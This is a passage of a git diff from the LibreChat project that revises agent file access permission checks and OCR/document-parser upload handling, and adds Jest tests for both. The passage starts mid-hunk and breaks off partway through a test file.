role,
|
role,
|
||||||
|
|
@ -46,7 +68,6 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
|
||||||
}
|
}
|
||||||
|
|
||||||
if (isDelete) {
|
if (isDelete) {
|
||||||
// Check if user has EDIT permission (which would indicate collaborative access)
|
|
||||||
const hasEditPermission = await checkPermission({
|
const hasEditPermission = await checkPermission({
|
||||||
userId,
|
userId,
|
||||||
role,
|
role,
|
||||||
|
|
@ -55,23 +76,11 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
|
||||||
requiredPermission: PermissionBits.EDIT,
|
requiredPermission: PermissionBits.EDIT,
|
||||||
});
|
});
|
||||||
|
|
||||||
// If user only has VIEW permission, they can't access files
|
|
||||||
// Only users with EDIT permission or higher can access agent files
|
|
||||||
if (!hasEditPermission) {
|
if (!hasEditPermission) {
|
||||||
return accessMap;
|
return accessMap;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
const attachedFileIds = new Set();
|
|
||||||
if (agent.tool_resources) {
|
|
||||||
for (const [_resourceType, resource] of Object.entries(agent.tool_resources)) {
|
|
||||||
if (resource?.file_ids && Array.isArray(resource.file_ids)) {
|
|
||||||
resource.file_ids.forEach((fileId) => attachedFileIds.add(fileId));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// Grant access only to files that are attached to this agent
|
|
||||||
fileIds.forEach((fileId) => {
|
fileIds.forEach((fileId) => {
|
||||||
if (attachedFileIds.has(fileId)) {
|
if (attachedFileIds.has(fileId)) {
|
||||||
accessMap.set(fileId, true);
|
accessMap.set(fileId, true);
|
||||||
|
|
@ -95,7 +104,7 @@ const hasAccessToFilesViaAgent = async ({ userId, role, fileIds, agentId, isDele
|
||||||
* @returns {Promise<Array<MongoFile>>} Filtered array of accessible files
|
* @returns {Promise<Array<MongoFile>>} Filtered array of accessible files
|
||||||
*/
|
*/
|
||||||
const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => {
|
const filterFilesByAgentAccess = async ({ files, userId, role, agentId }) => {
|
||||||
if (!userId || !agentId || !files || files.length === 0) {
|
if (!userId || !agentId || !files || files.length === 0 || isEphemeralAgentId(agentId)) {
|
||||||
return files;
|
return files;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
409
api/server/services/Files/permissions.spec.js
Normal file
409
api/server/services/Files/permissions.spec.js
Normal file
|
|
@ -0,0 +1,409 @@
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
logger: { error: jest.fn() },
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/PermissionService', () => ({
|
||||||
|
checkPermission: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Agent', () => ({
|
||||||
|
getAgent: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
const { logger } = require('@librechat/data-schemas');
|
||||||
|
const { Constants, PermissionBits, ResourceType } = require('librechat-data-provider');
|
||||||
|
const { checkPermission } = require('~/server/services/PermissionService');
|
||||||
|
const { getAgent } = require('~/models/Agent');
|
||||||
|
const { filterFilesByAgentAccess, hasAccessToFilesViaAgent } = require('./permissions');
|
||||||
|
|
||||||
|
const AUTHOR_ID = 'author-user-id';
|
||||||
|
const USER_ID = 'viewer-user-id';
|
||||||
|
const AGENT_ID = 'agent_test-abc123';
|
||||||
|
const AGENT_MONGO_ID = 'mongo-agent-id';
|
||||||
|
|
||||||
|
function makeFile(file_id, user) {
|
||||||
|
return { file_id, user, filename: `${file_id}.txt` };
|
||||||
|
}
|
||||||
|
|
||||||
|
function makeAgent(overrides = {}) {
|
||||||
|
return {
|
||||||
|
_id: AGENT_MONGO_ID,
|
||||||
|
id: AGENT_ID,
|
||||||
|
author: AUTHOR_ID,
|
||||||
|
tool_resources: {
|
||||||
|
file_search: { file_ids: ['attached-1', 'attached-2'] },
|
||||||
|
execute_code: { file_ids: ['attached-3'] },
|
||||||
|
},
|
||||||
|
...overrides,
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('filterFilesByAgentAccess', () => {
|
||||||
|
describe('early returns (no DB calls)', () => {
|
||||||
|
it('should return files unfiltered for ephemeral agentId', async () => {
|
||||||
|
const files = [makeFile('f1', 'other-user')];
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files,
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: Constants.EPHEMERAL_AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBe(files);
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return files unfiltered for non-agent_ prefixed agentId', async () => {
|
||||||
|
const files = [makeFile('f1', 'other-user')];
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files,
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: 'custom-memory-id',
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBe(files);
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return files when userId is missing', async () => {
|
||||||
|
const files = [makeFile('f1', 'someone')];
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files,
|
||||||
|
userId: undefined,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBe(files);
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return files when agentId is missing', async () => {
|
||||||
|
const files = [makeFile('f1', 'someone')];
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files,
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: undefined,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBe(files);
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return empty array when files is empty', async () => {
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [],
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([]);
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return undefined when files is nullish', async () => {
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: null,
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toBeNull();
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('all files owned by userId', () => {
|
||||||
|
it('should return all files without calling getAgent', async () => {
|
||||||
|
const files = [makeFile('f1', USER_ID), makeFile('f2', USER_ID)];
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files,
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual(files);
|
||||||
|
expect(getAgent).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('mixed owned and non-owned files', () => {
|
||||||
|
const ownedFile = makeFile('owned-1', USER_ID);
|
||||||
|
const sharedFile = makeFile('attached-1', AUTHOR_ID);
|
||||||
|
const unattachedFile = makeFile('not-attached', AUTHOR_ID);
|
||||||
|
|
||||||
|
it('should return owned + accessible non-owned files when user has VIEW', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(true);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [ownedFile, sharedFile, unattachedFile],
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toHaveLength(2);
|
||||||
|
expect(result.map((f) => f.file_id)).toContain('owned-1');
|
||||||
|
expect(result.map((f) => f.file_id)).toContain('attached-1');
|
||||||
|
expect(result.map((f) => f.file_id)).not.toContain('not-attached');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return only owned files when user lacks VIEW permission', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(false);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [ownedFile, sharedFile],
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([ownedFile]);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return only owned files when agent is not found', async () => {
|
||||||
|
getAgent.mockResolvedValue(null);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [ownedFile, sharedFile],
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([ownedFile]);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return only owned files on DB error (fail-closed)', async () => {
|
||||||
|
getAgent.mockRejectedValue(new Error('DB connection lost'));
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [ownedFile, sharedFile],
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([ownedFile]);
|
||||||
|
expect(logger.error).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('file with no user field', () => {
|
||||||
|
it('should treat file as non-owned and run through access check', async () => {
|
||||||
|
const noUserFile = makeFile('attached-1', undefined);
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(true);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [noUserFile],
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(getAgent).toHaveBeenCalled();
|
||||||
|
expect(result).toEqual([noUserFile]);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should exclude file with no user field when not attached to agent', async () => {
|
||||||
|
const noUserFile = makeFile('not-attached', null);
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(true);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [noUserFile],
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([]);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('no owned files (all non-owned)', () => {
|
||||||
|
const file1 = makeFile('attached-1', AUTHOR_ID);
|
||||||
|
const file2 = makeFile('not-attached', AUTHOR_ID);
|
||||||
|
|
||||||
|
it('should return only attached files when user has VIEW', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(true);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [file1, file2],
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([file1]);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return empty array when no VIEW permission', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(false);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [file1, file2],
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([]);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return empty array when agent not found', async () => {
|
||||||
|
getAgent.mockResolvedValue(null);
|
||||||
|
|
||||||
|
const result = await filterFilesByAgentAccess({
|
||||||
|
files: [file1],
|
||||||
|
userId: USER_ID,
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result).toEqual([]);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('hasAccessToFilesViaAgent', () => {
|
||||||
|
describe('agent not found', () => {
|
||||||
|
it('should return all-false map', async () => {
|
||||||
|
getAgent.mockResolvedValue(null);
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: USER_ID,
|
||||||
|
fileIds: ['f1', 'f2'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('f1')).toBe(false);
|
||||||
|
expect(result.get('f2')).toBe(false);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('author path', () => {
|
||||||
|
it('should grant access to attached files for the agent author', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: AUTHOR_ID,
|
||||||
|
fileIds: ['attached-1', 'not-attached'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('attached-1')).toBe(true);
|
||||||
|
expect(result.get('not-attached')).toBe(false);
|
||||||
|
expect(checkPermission).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('VIEW permission path', () => {
|
||||||
|
it('should grant access to attached files for viewer with VIEW permission', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(true);
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
fileIds: ['attached-1', 'attached-3', 'not-attached'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('attached-1')).toBe(true);
|
||||||
|
expect(result.get('attached-3')).toBe(true);
|
||||||
|
expect(result.get('not-attached')).toBe(false);
|
||||||
|
|
||||||
|
expect(checkPermission).toHaveBeenCalledWith({
|
||||||
|
userId: USER_ID,
|
||||||
|
role: 'USER',
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: AGENT_MONGO_ID,
|
||||||
|
requiredPermission: PermissionBits.VIEW,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should deny all when VIEW permission is missing', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValue(false);
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: USER_ID,
|
||||||
|
fileIds: ['attached-1'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('attached-1')).toBe(false);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('delete path (EDIT permission required)', () => {
|
||||||
|
it('should grant access when both VIEW and EDIT pass', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(true);
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: USER_ID,
|
||||||
|
fileIds: ['attached-1'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
isDelete: true,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('attached-1')).toBe(true);
|
||||||
|
expect(checkPermission).toHaveBeenCalledTimes(2);
|
||||||
|
expect(checkPermission).toHaveBeenLastCalledWith(
|
||||||
|
expect.objectContaining({ requiredPermission: PermissionBits.EDIT }),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should deny all when VIEW passes but EDIT fails', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent());
|
||||||
|
checkPermission.mockResolvedValueOnce(true).mockResolvedValueOnce(false);
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: USER_ID,
|
||||||
|
fileIds: ['attached-1'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
isDelete: true,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('attached-1')).toBe(false);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('error handling', () => {
|
||||||
|
it('should return all-false map on DB error (fail-closed)', async () => {
|
||||||
|
getAgent.mockRejectedValue(new Error('connection refused'));
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: USER_ID,
|
||||||
|
fileIds: ['f1', 'f2'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('f1')).toBe(false);
|
||||||
|
expect(result.get('f2')).toBe(false);
|
||||||
|
expect(logger.error).toHaveBeenCalledWith(
|
||||||
|
'[hasAccessToFilesViaAgent] Error checking file access:',
|
||||||
|
expect.any(Error),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('agent with no tool_resources', () => {
|
||||||
|
it('should deny all files even for the author', async () => {
|
||||||
|
getAgent.mockResolvedValue(makeAgent({ tool_resources: undefined }));
|
||||||
|
|
||||||
|
const result = await hasAccessToFilesViaAgent({
|
||||||
|
userId: AUTHOR_ID,
|
||||||
|
fileIds: ['f1'],
|
||||||
|
agentId: AGENT_ID,
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(result.get('f1')).toBe(false);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -16,6 +16,7 @@ const {
|
||||||
removeNullishValues,
|
removeNullishValues,
|
||||||
isAssistantsEndpoint,
|
isAssistantsEndpoint,
|
||||||
getEndpointFileConfig,
|
getEndpointFileConfig,
|
||||||
|
documentParserMimeTypes,
|
||||||
} = require('librechat-data-provider');
|
} = require('librechat-data-provider');
|
||||||
const { EnvVar } = require('@librechat/agents');
|
const { EnvVar } = require('@librechat/agents');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
|
|
@ -523,6 +524,12 @@ const processAgentFileUpload = async ({ req, res, metadata }) => {
|
||||||
* @return {Promise<void>}
|
* @return {Promise<void>}
|
||||||
*/
|
*/
|
||||||
const createTextFile = async ({ text, bytes, filepath, type = 'text/plain' }) => {
|
const createTextFile = async ({ text, bytes, filepath, type = 'text/plain' }) => {
|
||||||
|
const textBytes = Buffer.byteLength(text, 'utf8');
|
||||||
|
if (textBytes > 15 * megabyte) {
|
||||||
|
throw new Error(
|
||||||
|
`Extracted text from "${file.originalname}" exceeds the 15MB storage limit (${Math.round(textBytes / megabyte)}MB). Try a shorter document.`,
|
||||||
|
);
|
||||||
|
}
|
||||||
const fileInfo = removeNullishValues({
|
const fileInfo = removeNullishValues({
|
||||||
text,
|
text,
|
||||||
bytes,
|
bytes,
|
||||||
|
|
@ -553,30 +560,53 @@ const processAgentFileUpload = async ({ req, res, metadata }) => {
|
||||||
|
|
||||||
const fileConfig = mergeFileConfig(appConfig.fileConfig);
|
const fileConfig = mergeFileConfig(appConfig.fileConfig);
|
||||||
|
|
||||||
const shouldUseOCR =
|
const shouldUseConfiguredOCR =
|
||||||
appConfig?.ocr != null &&
|
appConfig?.ocr != null &&
|
||||||
fileConfig.checkType(file.mimetype, fileConfig.ocr?.supportedMimeTypes || []);
|
fileConfig.checkType(file.mimetype, fileConfig.ocr?.supportedMimeTypes || []);
|
||||||
|
|
||||||
if (shouldUseOCR && !(await checkCapability(req, AgentCapabilities.ocr))) {
|
const shouldUseDocumentParser =
|
||||||
throw new Error('OCR capability is not enabled for Agents');
|
!shouldUseConfiguredOCR && documentParserMimeTypes.some((regex) => regex.test(file.mimetype));
|
||||||
} else if (shouldUseOCR) {
|
|
||||||
|
const shouldUseOCR = shouldUseConfiguredOCR || shouldUseDocumentParser;
|
||||||
|
|
||||||
|
const resolveDocumentText = async () => {
|
||||||
|
if (shouldUseConfiguredOCR) {
|
||||||
try {
|
try {
|
||||||
const { handleFileUpload: uploadOCR } = getStrategyFunctions(
|
const ocrStrategy = appConfig?.ocr?.strategy ?? FileSources.document_parser;
|
||||||
appConfig?.ocr?.strategy ?? FileSources.mistral_ocr,
|
const { handleFileUpload } = getStrategyFunctions(ocrStrategy);
|
||||||
);
|
return await handleFileUpload({ req, file, loadAuthValues });
|
||||||
const {
|
} catch (err) {
|
||||||
text,
|
|
||||||
bytes,
|
|
||||||
filepath: ocrFileURL,
|
|
||||||
} = await uploadOCR({ req, file, loadAuthValues });
|
|
||||||
return await createTextFile({ text, bytes, filepath: ocrFileURL });
|
|
||||||
} catch (ocrError) {
|
|
||||||
logger.error(
|
logger.error(
|
||||||
`[processAgentFileUpload] OCR processing failed for file "${file.originalname}", falling back to text extraction:`,
|
`[processAgentFileUpload] Configured OCR failed for "${file.originalname}", falling back to document_parser:`,
|
||||||
ocrError,
|
err,
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
try {
|
||||||
|
const { handleFileUpload } = getStrategyFunctions(FileSources.document_parser);
|
||||||
|
return await handleFileUpload({ req, file, loadAuthValues });
|
||||||
|
} catch (err) {
|
||||||
|
logger.error(
|
||||||
|
`[processAgentFileUpload] Document parser failed for "${file.originalname}":`,
|
||||||
|
err,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
if (shouldUseConfiguredOCR && !(await checkCapability(req, AgentCapabilities.ocr))) {
|
||||||
|
throw new Error('OCR capability is not enabled for Agents');
|
||||||
|
}
|
||||||
|
|
||||||
|
if (shouldUseOCR) {
|
||||||
|
const ocrResult = await resolveDocumentText();
|
||||||
|
if (ocrResult) {
|
||||||
|
const { text, bytes, filepath: ocrFileURL } = ocrResult;
|
||||||
|
return await createTextFile({ text, bytes, filepath: ocrFileURL });
|
||||||
|
}
|
||||||
|
throw new Error(
|
||||||
|
`Unable to extract text from "${file.originalname}". The document may be image-based and requires an OCR service to process.`,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
const shouldUseSTT = fileConfig.checkType(
|
const shouldUseSTT = fileConfig.checkType(
|
||||||
file.mimetype,
|
file.mimetype,
|
||||||
|
|
|
||||||
347
api/server/services/Files/process.spec.js
Normal file
347
api/server/services/Files/process.spec.js
Normal file
|
|
@ -0,0 +1,347 @@
|
||||||
|
jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') }));
|
||||||
|
|
||||||
|
jest.mock('@librechat/data-schemas', () => ({
|
||||||
|
logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() },
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/agents', () => ({
|
||||||
|
EnvVar: { CODE_API_KEY: 'CODE_API_KEY' },
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/api', () => ({
|
||||||
|
sanitizeFilename: jest.fn((n) => n),
|
||||||
|
parseText: jest.fn().mockResolvedValue({ text: '', bytes: 0 }),
|
||||||
|
processAudioFile: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('librechat-data-provider', () => ({
|
||||||
|
...jest.requireActual('librechat-data-provider'),
|
||||||
|
mergeFileConfig: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/images', () => ({
|
||||||
|
convertImage: jest.fn(),
|
||||||
|
resizeAndConvert: jest.fn(),
|
||||||
|
resizeImageBuffer: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/controllers/assistants/v2', () => ({
|
||||||
|
addResourceFileId: jest.fn(),
|
||||||
|
deleteResourceFileId: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models/Agent', () => ({
|
||||||
|
addAgentResourceFile: jest.fn().mockResolvedValue({}),
|
||||||
|
removeAgentResourceFiles: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/controllers/assistants/helpers', () => ({
|
||||||
|
getOpenAIClient: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Tools/credentials', () => ({
|
||||||
|
loadAuthValues: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/models', () => ({
|
||||||
|
createFile: jest.fn().mockResolvedValue({ file_id: 'created-file-id' }),
|
||||||
|
updateFileUsage: jest.fn(),
|
||||||
|
deleteFiles: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/utils/getFileStrategy', () => ({
|
||||||
|
getFileStrategy: jest.fn().mockReturnValue('local'),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Config', () => ({
|
||||||
|
checkCapability: jest.fn().mockResolvedValue(true),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/utils/queue', () => ({
|
||||||
|
LB_QueueAsyncCall: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/strategies', () => ({
|
||||||
|
getStrategyFunctions: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/utils', () => ({
|
||||||
|
determineFileType: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/Files/Audio/STTService', () => ({
|
||||||
|
STTService: { getInstance: jest.fn() },
|
||||||
|
}));
|
||||||
|
|
||||||
|
const { EToolResources, FileSources, AgentCapabilities } = require('librechat-data-provider');
|
||||||
|
const { mergeFileConfig } = require('librechat-data-provider');
|
||||||
|
const { checkCapability } = require('~/server/services/Config');
|
||||||
|
const { getStrategyFunctions } = require('~/server/services/Files/strategies');
|
||||||
|
const { processAgentFileUpload } = require('./process');
|
||||||
|
|
||||||
|
const PDF_MIME = 'application/pdf';
|
||||||
|
const DOCX_MIME = 'application/vnd.openxmlformats-officedocument.wordprocessingml.document';
|
||||||
|
const XLSX_MIME = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet';
|
||||||
|
const XLS_MIME = 'application/vnd.ms-excel';
|
||||||
|
const ODS_MIME = 'application/vnd.oasis.opendocument.spreadsheet';
|
||||||
|
const ODT_MIME = 'application/vnd.oasis.opendocument.text';
|
||||||
|
const ODP_MIME = 'application/vnd.oasis.opendocument.presentation';
|
||||||
|
const ODG_MIME = 'application/vnd.oasis.opendocument.graphics';
|
||||||
|
|
||||||
|
const makeReq = ({ mimetype = PDF_MIME, ocrConfig = null } = {}) => ({
|
||||||
|
user: { id: 'user-123' },
|
||||||
|
file: {
|
||||||
|
path: '/tmp/upload.bin',
|
||||||
|
originalname: 'upload.bin',
|
||||||
|
filename: 'upload-uuid.bin',
|
||||||
|
mimetype,
|
||||||
|
},
|
||||||
|
body: { model: 'gpt-4o' },
|
||||||
|
config: {
|
||||||
|
fileConfig: {},
|
||||||
|
fileStrategy: 'local',
|
||||||
|
ocr: ocrConfig,
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
const makeMetadata = () => ({
|
||||||
|
agent_id: 'agent-abc',
|
||||||
|
tool_resource: EToolResources.context,
|
||||||
|
file_id: 'file-uuid-123',
|
||||||
|
});
|
||||||
|
|
||||||
|
const mockRes = {
|
||||||
|
status: jest.fn().mockReturnThis(),
|
||||||
|
json: jest.fn().mockReturnValue({}),
|
||||||
|
};
|
||||||
|
|
||||||
|
const makeFileConfig = ({ ocrSupportedMimeTypes = [] } = {}) => ({
|
||||||
|
checkType: (mime, types) => (types ?? []).includes(mime),
|
||||||
|
ocr: { supportedMimeTypes: ocrSupportedMimeTypes },
|
||||||
|
stt: { supportedMimeTypes: [] },
|
||||||
|
text: { supportedMimeTypes: [] },
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('processAgentFileUpload', () => {
|
||||||
|
beforeEach(() => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
mockRes.status.mockReturnThis();
|
||||||
|
mockRes.json.mockReturnValue({});
|
||||||
|
checkCapability.mockResolvedValue(true);
|
||||||
|
getStrategyFunctions.mockReturnValue({
|
||||||
|
handleFileUpload: jest
|
||||||
|
.fn()
|
||||||
|
.mockResolvedValue({ text: 'extracted text', bytes: 42, filepath: 'doc://result' }),
|
||||||
|
});
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig());
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('OCR strategy selection', () => {
|
||||||
|
test.each([
|
||||||
|
['PDF', PDF_MIME],
|
||||||
|
['DOCX', DOCX_MIME],
|
||||||
|
['XLSX', XLSX_MIME],
|
||||||
|
['XLS', XLS_MIME],
|
||||||
|
['ODS', ODS_MIME],
|
||||||
|
['Excel variant (msexcel)', 'application/msexcel'],
|
||||||
|
['Excel variant (x-msexcel)', 'application/x-msexcel'],
|
||||||
|
])('uses document_parser automatically for %s when no OCR is configured', async (_, mime) => {
|
||||||
|
mergeFileConfig.mockReturnValue(makeFileConfig());
|
||||||
|
const req = makeReq({ mimetype: mime, ocrConfig: null });
|
||||||
|
|
||||||
|
